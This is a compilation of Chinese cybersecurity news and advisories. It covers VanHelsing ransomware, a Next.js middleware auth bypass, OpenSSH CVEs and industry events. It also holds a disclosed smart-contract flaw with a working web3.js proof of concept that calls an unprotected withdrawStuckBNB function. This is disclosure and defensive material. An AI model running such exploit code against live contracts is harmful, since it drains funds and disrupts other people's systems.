VanHelsing 使用 ChaCha20 算法进行文件加密，为每个文件生成一个 32 字节（256 位）的对称密钥和一个 12 字节的随机数。然后，使用嵌入的 Curve25519 公钥加密这些值，并将生成的加密密钥 / 随机数对存储在加密文件中。

VanHelsing 对大于 1GB 的文件进行部分加密，但对较小的文件则运行完整的加密过程。

该恶意软件支持丰富的 CLI 定制，以便针对每个受害者定制攻击。例如，可以针对特定驱动器和文件夹、限制加密范围、通过 SMB 传播、跳过卷影副本删除，以及启用两相隐身模式。

在正常加密模式下，VanHelsing 会枚举文件和文件夹，加密文件内容，并重命名生成的文件，附加 “.vanhelsing” 扩展名。

在隐身模式下，勒索软件将加密与文件重命名分离。由于文件 I/O 模式模仿正常系统行为，因此不太可能触发警报。即使安全工具在重命名阶段开始时做出反应，在第二遍操作时，整个目标数据集也已经被加密了。

隐形加密功能

尽管 VanHelsing 看起来很先进且发展迅速，但 Check Point 注意到了一些代码不成熟的问题。其中包括文件扩展名不匹配、可能触发双重加密的排除列表逻辑错误，以及几个未实现的命令行标志。尽管存在这些错误，VanHelsing 仍然是一个令人担忧且不断上升的威胁，正在逐渐受到更多关注。

1、漏洞概述

近日，vercel发布更新修复Next.js中间件鉴权绕过漏洞（CVE-2025-29927），建议您及时开展安全风险自查。

据描述，由于 next.js应用程序使用中间件时，其函数调用 runMiddleware 会识别x-middle-subrequest请求头，用以识别是否应用了中间件，如果其值是中间所在路径，则可以完全绕过鉴权。攻击者可以利用该漏洞获取服务器敏感信息。如果站点具有缓存/CDN 系统，则可能会强制缓存 404 响应，从而使其页面不可用，严重影响其可用性 。

漏洞影响的产品和版本：

11.1.4 <= next.js <= 13.5.6  

14.0.0 <= next.js <= 14.2.24  

15.0.0 <= next.js <= 15.2.2

2、漏洞复现

3、资产测绘

据daydaymap数据显示互联网存在2,864,117个资产，国内风险资产分布情况如下：

4、解决方案

临时缓解方案：

部署针对项目的监控系统：阻止包含 x-middleware-subrequest 标头的外部用户请求到达您的 Next.js 应用程序。

升级修复：

目前官方已发布修复安全补丁

5、参考链接

原文链接

1、背景描述

合约是一个在满足特定条件时在区块链上执行代码的程序，各方以数字签署合同的方式准许并维护它的其运行。这些代码可以是向朋友汇款、买卖 NFT 虚拟商品等一系列复杂的内容。

 存在漏洞的目标合约是一个结合Meme文化病毒式传播与去中心化金融（DeFi）的创新项目，旨在通过趣味性和实用性打破传统Meme代币的模式。

该合约的代币目前市值1400K（USDT），日均交易量150K（USDT）

2、问题描述

该合约“withdrawStuckBNB”函数没有添加权限控制，攻击者可以通过调用“withdrawStuckBNB”函数，将合约内所有BNB转至营销地址“marketingAddress”，从而导致合约交易异常。

 tips：

BNB是BNB链生态系统的原生代币，该系统包含BNB智能链（BSC）和BNB信标链。在BNB智能链上，BNB用于支付交易费用和参与网络的共识机制。BNB还被用作实用代币，使用户在Binance中心化加密货币交易所进行交易时获得交易费用的折扣。

BNB在这个合约中的作用包括：作为交易对的配对货币，用于支付交易手续费，流动性池的组成部分，以及手续费收入的分配媒介

3、问题代码分析

```solidity
function withdrawStuckBNB() external {    
bool success;    
(success,) = address(marketingAddress).call{value: address(this).balance}("");
}
```

在合约代码里面可以看到，`withdrawStuckBNB` 没有添加onlyOwner修饰，只有external修饰

tips：

    Solidity语法中有4中默认函数修饰符

    - public：最大访问权限，任何人都可以调用。

    - private：只有合约内部可以调用，不可以被继承。

    - internal：子合约可以继承和调用。

    - external：外部可以调用，子合约可以继承和调用，当前合约不可以调用。

onlyOwner是该合约自定义一个修饰器，用于修饰函数，只有合约的所有者才能调用该函数。

这就意味着任何人都可以调用这个函数，将合约内所有BNB转至营销地址，导致资金被盗。

4、后续利用链分析

从问题代码可知，任何人都可以调用这个函数，将合约内所有BNB转至营销地址marketingAddress

查看marketingAddress的代码，marketingAddress是一个营销地址，更新marketingAddress的代码如下：

可以看到，updateMarketingAddress函数存在onlyOwner修饰，只有owner可以调用这个函数，这就意味着只有owner可以更新marketingAddress的地址。所以利用链到此截止，攻击者只能调用withdrawStuckBNB将合约内的BNB转至marketingAddress，但是marketingAddress本身只能由owner更新，所以攻击者无法更新marketingAddress的地址，从而无法将BNB转至攻击者的地址，但是漏洞也能造成合约内BNB的清空，影响合约运行。

5、构造POC

```javascriptconst Web3 = require('web3');// // 初始化 Web3 实例，这里使用测试网的地址，你可以根据实际情况修改const web3 = new Web3('https://data-seed-prebsc-1-s1.binance.org:8545');// const web3 = new Web3('https://bsc-dataseed4.binance.org/');
const contractABI = ["""换成完整ABI"""];const contractAddress = "0xaaaaa"; // 替换为目标合约地址const contract = new web3.eth.Contract(contractABI, contractAddress);console.log("connect success");
// 如果使用 Node.js，需要添加私钥const privateKey = '0xbbbbbbbbbbbbbb'; // 替换为你的私钥const account = web3.eth.accounts.privateKeyToAccount(privateKey);web3.eth.accounts.wallet.add(account);
async function withdrawBNB() {    try{        console.log(account.address);        const tx = {            from: account.address, // 必须使用真实地址            to: contractAddress,            gas: 300000,            data: contract.methods.withdrawStuckBNB().encodeABI()        };
       // 估算 gas        const gas = await web3.eth.estimateGas(tx);        tx.gas = gas;
       // 获取当前 gasPrice        const gasPrice = await web3.eth.getGasPrice();        tx.gasPrice = gasPrice;
       // 签名并发送交易（Node.js 方式）        const signedTx = await web3.eth.accounts.signTransaction(tx, privateKey);        const receipt = await web3.eth.sendSignedTransaction(signedTx.rawTransaction);
       console.log('Transaction Hash:', receipt.transactionHash);        console.log('Receipt:', receipt);    } catch (error) {        console.error("Error:", error);    }    console.log("2");}
withdrawBNB();console.log("3");```

6、修复方案

在withdrawStuckBNB函数中添加onlyOwner修饰，只允许owner可以调用这个函数

```solidity
function withdrawStuckBNB() external onlyOwner {    
(bool success,) = marketingAddress.call{value: address(this).balance}("");    
require(success, "Transfer failed");
}
```

   该漏洞目前已向相关单位和厂商报送并已推出补丁，使用此漏洞造成的任何攻击影响均与本文作者无关。

原文链接

3月31日，由上海市通信管理局指导、上海市互联网协会主办的“APP合规安全公益行”在上海浦东软件园盛大举行。此次活动围绕APP合规安全的关键议题展开深入交流，共同探寻行业未来发展的新路径，致力于推动APP行业实现健康、有序、可持续的发展。梆梆安全受邀出席作主题分享，深度剖析典型场景下的隐私合规技术实践。

上海市互联网协会副秘书长姜国致辞，着重强调构建健康、安全、有序的APP生态系统迫在眉睫。当前，恶意软件肆虐、个人信息违规收集以及数据泄露等问题频发，严重威胁着用户权益、行业发展乃至社会稳定。只有打造规范的APP生态，才能为行业持续创新发展筑牢根基，切实保障广大用户的合法权益。

上海市互联网协会副秘书长 姜国

会议期间，上海市通信管理局移动互联网工作组专家钱艺玮女士详细讲解了2025年APP用户权益保护监督管理重点部署。

上海市通信管理局移动互联网工作组专家 钱艺玮

在主题分享环节，梆梆安全合规专家王毅发表《移动互联网应用隐私合规技术》演讲，结合隐私合规监管要求以及典型案例，深入剖析APP的隐私合规标准以及在“违法违规收集个人信息、自启动及关联启动滥用、欺骗诱导用户授权”等高发违规场景下的合规安全实操技术重点。

梆梆安全合规专家 王毅

会议最后，上海市通信管理局互联网管理处纪容对会议进行总结，对本次活动的成果给予肯定，并鼓励各方继续携手合作，共同推进APP合规安全工作。纪容指出，在上海市通信管理局的指导下，通过各方共同努力，一定能够构建一个安全、透明、可信赖的APP使用环境，为用户提供更加优质、安全的服务。

上海市通信管理局互联网管理处 纪容

本次 “APP合规安全公益行” 活动为行业搭建了一个交流与合作的平台，通过政策解读、技术分享和案例分析，提高了企业对APP合规安全的重视程度，增强企业应对合规安全挑战的能力。

梆梆安全作为个人信息保护生态建设的守护者，依托多年技术沉淀，以为“自动化检测+人工审查”形式，提供从合规检测、风险评估到整改落地的个人信息隐私合规评估及咨询服务，帮助用户发现多业务场景下的应用违规行为，助力企业构建符合监管要求的移动安全防护体系。针对近期在业务场景中高频发生的违法违规收集使用个人信息典型问题，梆梆安全提供合规建议如下：

1. 自启动和关联启动场景

合规建议：确因业务实现需要的自启动行为，需要在隐私政策中明确说明自启动的主体、场景及业务必要性；须征得用户同意隐私政策后启动；不得存在结束进程/伴随系统启动而启动的自启动行为；须区分自身或第三方SDK的自启动行为。

2. 个人信息收集场景

合规建议：APP需设置隐私政策、明确收集使用个人信息规则；明确APP使用个人信息的目的、方式、范围等；APP首次运行时以弹窗提示用户阅读隐私政策（不得默认勾选）；隐私政策同意前/拒绝后，不得收集个人信息；不得超出授权范围收集个人信息；遵循最小必要原则；仅收集与当前场景相关的个人信息。

3. 欺骗误导用户授权场景

合规建议：关闭/跳过按钮应明显、有效；不能全局跳转，需设置跳转控件；摇一摇重力感应需满足参数要求；推荐下载需明示开发运营者、产品功能、隐私政策、权限列表等必要信息，不得“偷梁换柱，强制捆绑，静默下载”。

近日，四部委联合启动2025年个人信息保护系列专项行动，将针对“App（含小程序、公众号、快应用）、SDK、智能终端、人脸识别”等六大违法违规收集使用个人信息典型问题开展集中治理，切实保护公民个人信息安全，督促指导个人信息处理者不断提升合规水平。

在数字经济与合规监管的双重驱动下，梆梆安全始终以"技术赋能合规"为核心战略，深耕移动安全技术研发，为企业构建覆盖全生命周期的数据安全防护体系。未来，公司将持续深化人工智能技术在隐私合规领域的融合应用，打造智能化、动态化的防护体系，为个人信息保护筑造坚实的技术防线，助力企业在合规道路高质量发展。

2025年3月31日，由国家工业信息安全发展研究中心、河北雄安新区改革发展局、河北雄安新区工信科技数据局联合主办，中国雄安集团数字城市科技有限公司承办的“第八届工业信息安全技能大赛全国总决赛（以下简称“总决赛”）”在河北雄安新区成功举办。其中，北京丈八网络安全科技有限公司作为总决赛技术支撑单位，在大赛专题研讨会环节主导了一次别开生面的“互动式勒索病毒推演演练”，并围绕自主研发的丈八兵棋推演系统进行了技术分享，受到现场专家广泛认可和关注。

本届总决赛旨在贯彻落实《网络安全法》《数据安全法》等相关法律法规和文件要求，深度践行全国新型工业化推进大会“统筹高质量发展与高水平安全”的战略部署，全面服务制造强国、网络强国建设，以护航「人工智能+高端制造」 保障“未来之城”安全发展为主题。其中，研讨会主题围绕“大型企业防勒索病毒实战推演”展开，这也是目前政府、大型央国企聚焦的网络安全和数据安全的重点方向。会议创新性引入了由丈八网安主导的互动式推演模式，来自国家工业信息安全发展研究中心、极智信、烽台科技、能嘉科技、赵亿科技、国际能源创新中心等机构和企业的专家学者、代表出席，并以决策者视角共同参与了这场沉浸式推演演练。

以下为丈八网安“互动式勒索病毒推演演练”全貌：

推演演练背景介绍——WannaCry勒索病毒入侵

此次推演的想定设计以知名勒索病毒WannaCry的入侵为背景，当其通过漏洞攻击、钓鱼邮件等途径向企业渗透，作为该企业的CSO，面对威胁该如何排兵布阵？分别在预防阶段、应急阶段以及处置阶段进行哪些策略的选择和下发，才能达到“最佳”防御效果，是本次推演的核心目标。

推演工具介绍——丈八兵棋推演系统

此次推演演练的工具为丈八兵棋推演系统，该系统依托丈八网安自主研发的孪生级数字仿真引擎，最大技术亮点在于其充分运用了离散事件数字仿真技术，以建模的方式低资源占用模拟大规模连续网络安全事件，从而构建网络攻防仿真专用沙盘。同时，该系统还引入人工智能技术，通过智能辅助决策与网络攻防智能体实现了“人在环内”与“人在环外”的双模式推演。

在此次推演演练中，其对事件所涉及的全域要素：企业内网资产模型、企业网络模型、人员行为模型、勒索病毒模型等进行了精准建模。

相较于网络靶场准专注对技术人员的技能训练，兵棋推演系统聚焦高层的战术决策能力训练，重视战术规划与决策逻辑，所以，该系统具备对攻击链、跨域影响的全局模拟能力，可实现对全局风险与策略的评估，有效检验和提升决策人员的宏观统筹和实时决策能力。

三轮推演：攻防策略的命运抉择

本次推演采用递进式实验设计，首轮展现 “无防护策略”下的企业勒索场景。WannaCry变种在8小时内感染37个节点，加密300GB核心数据。丈八网安技术团队通过动态调整 "推演时钟"，使现场专家在 2分钟内目睹从病毒渗透到数据损毁的完整攻击链，直观感受零防护状态下的企业损失。

次轮与末轮推演分别验证专家和企业代表投票选出的防护策略。第二轮采用 "临时应急+缴纳赎金" 组合方案，病毒扩散速度降低68%，但仍造成41%数据损失；第三轮启用"事前防御+事中应急+事后恢复"全周期方案，通过零信任架构和AI行为分析系统，实现对勒索病毒的100% 拦截。

本次推演在通用企业场景下实现网络攻击损失的量化评估，通过三轮递进式推演，验证了企业可以在有限的预算下，通过多次推演找到“最佳”防护策略。在安全事件发生前进行充分的推演验证，可帮助企业构建有效的主动防御体系。

丈八网安CEO、联合创始人王珩对推演环节进行技术解读，他表示：场景构建器、推演控制台、效能评估引擎是丈八兵棋推演系统的核心功能模块，系统的孪生级数字仿真技术确保模型搭建可以细化到每一个工具在攻防过程中的具体操作和效果，也可上升到宏观的战技法层面，可面向对象进行组件化建模，形成决策层专用的演练系统，它可以帮助安全决策人员从被动响应转向主动防御，从碎片分析转向全局掌控，从经验判断转向数据驱动，对构建网络空间安全战略优势而言意义重大。

未来，丈八网安将构建常态化攻防演练机制，依托"丈八兵棋推演系统"，针对金融、医疗、智能制造等关键领域推出定制化安全推演服务。通过高仿真还原APT攻击链、勒索病毒传播、数据泄露等典型威胁场景，以实战化推演锻造网络安全战略决策能力，助力构建国家数字安全策略新高地。

在数字化浪潮席卷全球的当下，网络安全已成为保障经济社会稳定发展的重要基石。作为国内网络安全领域的重要赛事，西湖论剑·中国杭州网络安全技能大赛（下称西湖论剑大赛）自创办以来，备受瞩目。3月29日，第八届西湖论剑大赛决赛拉开帷幕。在这场高手云集的竞技盛宴中，安恒信息高级副总裁、首席人才官苗春雨作为大赛承办方主要负责人，接受了我们的专访，深度解读大赛创新逻辑与网络安全人才培育之道。

AI双重视角：从“赋能安全”到“安全赋能”

西湖论剑大赛已经成功举办了七届，今年是第八个年头，始终追求与时俱进、公平公正，赛题在多样性和贴近实战上做了很多设置。“今年，我们在AI与网络安全的融合上迈出了更深入的一步。”安恒信息高级副总裁、首席人才官苗春雨在采访中表示，本届大赛的创新点可概括为“双向融合”：一是以AI技术优化网络安全解决方案（AI for security），二是在攻防场景中强化AI自身的安全性（Security in AI）。

苗春雨介绍，在创新挑战赛中，大赛倡导参赛队伍用AI这种新兴的生产力来改善网络安全的一些技术场景，提出解决方案。同时，比赛过程中，大赛会更关注了AI本身的安全。因为网络安全是伴生性技术，是发展的底座，因此需要平衡网络安全和发展的关系。换言之，我们在广泛使用各种AI技术的同时，要关注这种技术本身的安全性。只有AI安全，才能真正保证依靠AI技术优化网络安全解决方案的可靠和稳定。

这一理念不仅适用于大赛，更应在整个网络安全行业中得到推广和实践。苗春雨表示，期望通过西湖论剑大赛，激发更多创新思维，推动AI技术在垂直产业领域的应用，同时强化AI自身的安全防护，实现真正的“安全赋能”。

国际化赛道：构建全球网络安全协作生态

本届大赛自开赛以来，共吸引了436所高校和10余家企业的842支队伍、4169名网安英才参赛，并首次设立国际化赛道，吸引了不少海外高校的团队参赛。苗春雨坦言，本届大赛呈现出“国际化”的特性，不仅是西湖论剑大赛品牌影响力的拓展，更是网络安全技术生态的共建。

“网络安全不是割裂的，而是一个整体。海外选手的加入能促进攻防思路的交流和碰撞，也为国内选手提供了全球视野的参照。”苗春雨说。事实上，部分国际队伍的网络安全技术水平与国内队伍相比，还有一定的差距，特别是在实战性上，更为显著。但通过这样的交流，国内队伍在相互的切磋过程中，还能为海外的一些团队提供示范作用，逐步缩小国内外网安技术差异，促进全球网络安全共发展、共进步。

产教融合：从“赛事练兵”到“人才蓄水池”

西湖论剑网安大赛已连续举办八年，累计吸引1.7万名选手参与，为行业输送了大量实战型人才。苗春雨认为这是多年来“产教融合”“产学合作”持续深化的成果。

安恒信息作为历届大赛的承办方，每月定期举办“安恒杯”月赛，赛前配套讲解和培训，赛后配套沙龙与赛题复盘，引导学生在实践中掌握最新攻防技术。苗春雨提到，网络安全是动态变化的，场景不断更新，新技术不断涌现，仅靠课堂知识远远不够。月赛机制让学生能持续接触真实场景，形成‘学习－实践－反馈’的闭环。

与往年一样，今年的大赛依旧采取政企协作模式。一些赛题采取政企联合出题、人才挑战创新的模式，致力于打通教育链、创新链、产业链，聚焦网络安全产业高质量发展需求，实现“产学合作”“产教融合”，共创科学可行的产业解决方案。同时，鼓励在校生与从业人员同台竞技，实现产学碰撞，以此提升网络安全人才的实战能力和团队协作能力。

面对AI技术的飞速发展，苗春雨坦言，大赛的挑战在于“如何复现动态变化的攻防场景”。他表示，西湖论剑网安大赛让更多的人关注网络安全产业、网络安全人才培养的本质、实战技术人才培养的内涵，但未来趋势在不断变化，大赛需要建立更加体系化、动态化、主动化的防御体系，不断迭代赛题，才能培养出适应时代变革的人才。

网络安全的核心始终是人与技术的共进。我们期待西湖论剑大赛能让更多网安人才在实战中“破茧”，成为数字时代的守护者！

OpenSSH 发布了安全更新，修复了两个漏洞，一个是 MitM 攻击漏洞，另一个是拒绝服务漏洞，其中一个漏洞是在十多年前引入的。Qualys 发现了这两个漏洞，并向 OpenSSH 的维护人员展示了其可利用性。

OpenSSH（开放安全外壳）是 SSH（安全外壳）协议的一个免费开源实现，它为不安全网络上的安全远程访问、文件传输和隧道传输提供加密通信。

作为世界上最广泛使用的工具之一，在企业环境、信息技术、开发运维、云计算和网络安全应用中，基于 Linux 和 Unix（包括 BSD、macOS）的系统中有着很高的采用率。

两个漏洞

根据 CVE-2025-26465 跟踪的 MiTM 漏洞是在2014年12月发布 OpenSSH 6.8p1 时引入的，因此该问题在十多年内未被发现。

当启用“VerifyHostKeyDNS”选项时，该漏洞会影响 OpenSSH 客户端，允许威胁者执行 MitM 攻击。

无论 VerifyHostKeyDNS 选项设置为“yes”还是“no”，针对 OpenSSH 客户端（CVE-2025-26465）的攻击都能成功，不需要用户交互，也不依赖于 DNS 中是否存在 SSHFP 资源记录（SSH指纹）。

启用后，由于错误处理不当，攻击者可以通过在验证期间强制出现内存不足错误来欺骗客户端接受非法服务器的密钥。

通过拦截 SSH 连接并提供带有过多证书扩展的大 SSH 密钥，攻击者可以耗尽客户端的内存，绕过主机验证，劫持会话以窃取凭据、注入命令和泄露数据。

虽然“VerifyHostKeyDNS”选项在 OpenSSH 中默认是禁用的，但从2013年到2023年，它在 FreeBSD 上默认是启用的，这使得许多系统暴露在这些攻击之下。

第二个漏洞是 CVE-2025-26466，这是2023年8月发布的 OpenSSH 9.5p1 中引入的预认证拒绝服务漏洞。

这个问题源于密钥交换期间不受限制的内存分配，从而导致不受控制的资源消耗。

攻击者可以重复发送16字节的 ping 消息，这会迫使 OpenSSH 缓冲256字节的响应，而不会立即受到限制。

在密钥交换期间，这些响应将被无限期存储，从而导致内存消耗过多和 CPU 过载，从而可能导致系统崩溃。

利用 CVE-2025-26466 的后果可能没有第一个漏洞那么严重，但在身份验证之前利用它的事实保持了非常高的中断风险。

发布安全更新

OpenSSH 团队本周发布了9.9p2版本，解决了这两个漏洞，因此建议相关用户应尽快迁移到该版本。此外，除非绝对必要，建议禁用 VerifyHostKeyDNS ，并依靠手动密钥指纹验证来确保 SSH 连接的安全。

对于 DoS 问题，建议管理员执行严格的连接速率限制，并监控 SSH 流量的异常模式，以便及早阻止潜在的攻击。

在数字化时代，BOTS自动化攻击如同一场无声的风暴，正以前所未有的态势席卷全球网络空间。为了让各行业更好地应对自动化威胁挑战，瑞数信息作为BOTS自动化攻击防护领域的专业厂商，多年来持续输出BOTS自动化威胁报告，为各行各业用户做好自动化攻击安全防护提供参考指南。

近日，瑞数信息正式发布《BOTS自动化威胁报告》（以下简称“报告”），从整体态势、攻击手段、攻击特征、威胁防护建议等多个方面进行深度分析，剖析多个行业的BOTS自动化攻击案例，并对2025年BOTS自动化威胁发展趋势做出了最新研判。

报告指出，随着数字化转型深入和AI技术快速发展，2024年Bots自动化攻击呈现出新的特点和趋势。根据报告，全球65%的网络流量来自机器人程序，其中恶意Bots占比高达52%。攻击手段正经历从“脚本小子”到“AI集团军”的质的飞跃，传统防御体系面临前所未有的挑战。

从行业分布来看，金融行业首当其冲，成为恶意机器人攻击的重灾区。恶意流量占比高达61.2%，凸显了金融领域在数字化进程中面临的巨大安全挑战。政务服务、互联网、运营商等是攻击的重点领域，恶意流量占比均超过57%。值得关注的是，票务服务行业首次进入重点关注领域，成为Bots攻击新的重灾区，恶意机器人占比超过54%，这反映出随着经济复苏和文旅消费升温，自动化攻击的触角已伸向了更多民生领域。

从攻击目标来看，API接口和数据查询类业务成为了攻击者的首选。API接口调用攻击占比高达25.6%，首次超过公开数据查询。这一变化反映了微服务架构普及和业务系统解耦背景下，API作为连接各个系统组件的关键纽带，其安全防护的重要性日益凸显。需要指出的是，在AI技术的加持下，攻击者对业务逻辑的理解和利用能力显著提升，使得攻击更具针对性和隐蔽性，同时AI服务接口和数字身份服务成为新兴攻击目标。

从攻击手段来看，攻击手段的智能化升级更是令人担忧。AI驱动的攻击已占恶意流量的35%，生成式AI与自动化工具的深度融合，使得攻击手段呈现出智能化、场景化和产业化的特征。攻击者利用AI技术生成更具欺骗性的内容，自动规划攻击链路，动态调整攻击策略，甚至能够模拟真实用户的行为，从而突破传统防御体系的边界。

生成式AI技术的快速发展和普及，为自动化攻击注入了强大的动力。攻击者将AI技术深度融入自动化攻击工具中，不仅能够生成复杂的恶意代码、深度伪造的语音和视频等内容，还能在漏洞挖掘、利用开发到渗透路径规划等方面发挥关键作用。

通过学习海量的攻防知识，AI驱动的攻击工具表现出前所未有的智能化和拟人化特征，能够自动规划攻击链路、动态调整攻击策略、智能规避检测系统，在模拟“正常人” 行为和APT组织攻击行为等方面都达到了新的高度。这种新一代的自动化攻击方式正在突破传统防御体系的边界，攻击的准确性和成功率显著提升。

对于2025攻击威胁发展趋势，报告强调：

·生成式AI武器化让网络空间“易攻难守”将成为常态；

·构建网络韧性将成为行业共识；

·勒索软件攻击变得更加智能化和常态化；

·深度伪造引发的大规模欺诈风险将成倍增长；

·基于AI的高级Bots自动化工具已具备类似真实用户的行为特征

·API攻击和供应链正在成为网络安全又一“软肋”。

众多新技术的崛起令安全威胁以我们无法完全预见、管理或阻止的方式进行。2025年，可能成为一个转折点 —— 现在的问题已不在于是否需要采取行动，而是我们是否能及时采取行动。面对网络世界的错综复杂，预见风险、及时行动，才能化被动为主动，打赢网络安全“持久战”。